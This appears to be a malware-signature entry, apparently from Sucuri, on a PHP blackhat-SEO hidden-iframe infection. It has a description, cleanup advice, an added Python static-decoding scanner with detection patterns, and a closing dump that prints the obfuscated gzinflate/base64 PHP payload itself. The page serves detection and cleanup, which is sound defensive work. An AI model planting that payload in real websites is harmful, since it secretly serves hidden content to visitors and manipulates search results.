Malware Signatures


php.spam-seo.hiddeniframe.001

Blackhat SEO is a malicious technique used to manipulate search engine results so that a website gains relevance. The payload is PHP-based and therefore server-side: it executes directly on the server while the site is loading. Only the result of the payload (such as a malicious iframe or a redirect) is visible in the browser, not the malicious code itself.
Hidden iframes are one of the most common types of malware. This kind of injection is usually very small and therefore hard to notice, and any other malicious content can be loaded through such an iframe. Malware creators usually hide it with CSS properties, using techniques such as negative positioning, but another very common approach is to inject obfuscated JavaScript whose purpose is unclear and which is hard to decode. Such JavaScript code is responsible for hiding the iframes or other page elements.
In this case, another obfuscation layer is added to the payload: PHP encoding.

Affecting

Any vulnerable PHP-based website. Outdated software or compromised passwords can act as an infection vector.

Cleanup

Inspect your files for hidden iframes or any code that you do not recognize. You can also contact Sucuri for help with removing the infection.
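
One way to carry out this file inspection without executing suspect code, as an added example (not Sucuri's signature or tooling): a Python scanner that finds the `gzinflate(base64_decode(...))` wrapper shown in the Dump section, decodes it statically, peels stacked layers, and reports hidden-iframe indicators. The indicator list, the function names and the sample builder are assumptions constructed for illustration.

```python
import base64
import re
import zlib

# The wrapper seen in the dump: gzinflate(base64_decode("...")).
WRAPPER = re.compile(
    r"gzinflate\s*\(\s*base64_decode\s*\(\s*([\"'])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)", re.I)
# Assumed heuristics for what a decoded layer emits; extend for your environment.
INDICATORS = {
    "iframe": re.compile(r"<\s*iframe", re.I),
    "hidden-style": re.compile(
        r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d+", re.I),
    "js-unpacker": re.compile(r"\b(?:eval|unescape|fromCharCode)\s*\(", re.I),
}
MAX_OUT = 1 << 20  # cap inflated size so a crafted blob cannot exhaust memory

def decode_layer(blob):
    """Reproduce gzinflate(base64_decode(blob)) statically; nothing is executed."""
    try:
        raw = base64.b64decode(blob)
        out = zlib.decompressobj(-15).decompress(raw, MAX_OUT)  # raw DEFLATE
    except (ValueError, zlib.error):
        return None
    return out.decode("utf-8", errors="replace")

def scan_php(source, max_depth=5):
    """One finding per wrapper: offset, layers peeled, indicators in the final layer."""
    findings = []
    for m in WRAPPER.finditer(source):
        text, depth = decode_layer(m.group(2)), 1
        while text and depth < max_depth:  # peel stacked copies of the same wrapper
            inner = WRAPPER.search(text)
            nxt = decode_layer(inner.group(2)) if inner else None
            if nxt is None:
                break
            text, depth = nxt, depth + 1
        hits = sorted(k for k, rx in INDICATORS.items() if text and rx.search(text))
        findings.append({"offset": m.start(), "layers": depth,
                         "decodable": text is not None, "indicators": hits})
    return findings

def constructed_sample(html):
    """Test fixture in the dump's shape (constructed; not the payload from this page)."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    blob = base64.b64encode(c.compress(html.encode()) + c.flush()).decode()
    return '<?php echo(gzinflate(base64_decode("%s"))); ?>' % blob
```

Run `scan_php` over the contents of each PHP file under the web root; a finding with a non-empty `indicators` list marks a file to review by hand.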

Dump


echo(gzinflate(base64_decode("3Y5BDsIgFET3TXoH8jfVTYkuXGjBS3gBBArfUGjob6u3l9pbOKvJJG9mGPsPdZPOOBKjz2gFkH0Tf6lF7SnIujJJz4ON1K4ZyR6aDvusBsumrAV4ovHKOaW8qGAmrUIgr6jF2CeOsdUO76cLsFgIAY8ViWwGVtpTCBidADVTAvarfKZsbBYQS6ACuihAl+EN8BadJwFnYCsa8puTHd+vyOZ4q6uO75/lFw==")));